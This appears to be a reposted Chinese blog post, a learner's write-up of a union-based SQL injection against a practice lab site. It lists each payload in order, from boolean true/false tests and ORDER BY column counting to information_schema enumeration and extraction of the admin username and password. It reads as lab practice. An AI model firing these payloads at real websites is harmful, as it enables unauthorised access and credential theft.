SQL注入攻击原理 实战

我来进行实战了,总在看教程。

文章目录

  • 前言
  • 一,网站是否存在sql漏洞
  • 二、判断一下字段
  • 3. 判断显点
  • 4.查找相关信息
    • 1.查询数据库
    • 2.版本
    • 3.数据库表名
    • 4.字段名
    • 5,查询
  • 总结


前言

提示:这里可以添加本文要记录的大概内容:
前言,前言,前言(挠头)啊,我终于打实战了


提示:以下是本篇文章正文内容,下面案例可供参考

一,网站是否存在sql漏洞

 ?id=1 and 1=1

在这里插入图片描述
看这样子,应该是不存在的

如果没有就继续吧,

?id=1 and 1=2

在这里插入图片描述

哎,你看它变了,

二、判断一下字段

?id=1 and 1=1 order by 1

在这里插入图片描述
又回来了,没有那就试试这个?

?id=1 and 1=1 order by 2

在这里插入图片描述
哦,我的天啊,事不过三,试试这个

?id=1 and 1=1 order by 3

goog,成功了
在这里插入图片描述

3. 判断显点

?id=1 and 1=2 union select 1,2

在这里插入图片描述

你看,那里有个2

4.查找相关信息

1.查询数据库

?id=1 and 1=2 union select 1,database()

在这里插入图片描述
好吧,数据库名称就叫猫舍 辛巴

2.版本

?id=1 and 1=2 union select 1,version()

在这里插入图片描述

没啥可说的,

3.数据库表名

 ?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1

我承认这个长了点,我笔记也写了这么多
在这里插入图片描述

4.字段名

?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1 

在这里插入图片描述

?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1

在这里插入图片描述

5,查询

 ?id=1 and 1=2 union select 1,username from admin  limit 0,1

在这里插入图片描述

又回来了,

 ?id=1 and 1=2 union select 1,password from admin  limit 0,1

好了,拿到key了
在这里插入图片描述


总结

我是照着我记得笔记进行的,本文素材来自这里
有谁知道上面这只猫叫什么名字?看起来还不错,应该好养文章来源地址https://uudwc.com/A/OmkyM

原文地址:https://blog.csdn.net/m0_54471074/article/details/131577469

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请联系站长进行投诉反馈,一经查实,立即删除!

上一篇 2023年07月07日 04:12
使用opencv的viz模块显示3d点云
下一篇 2023年07月07日 04:13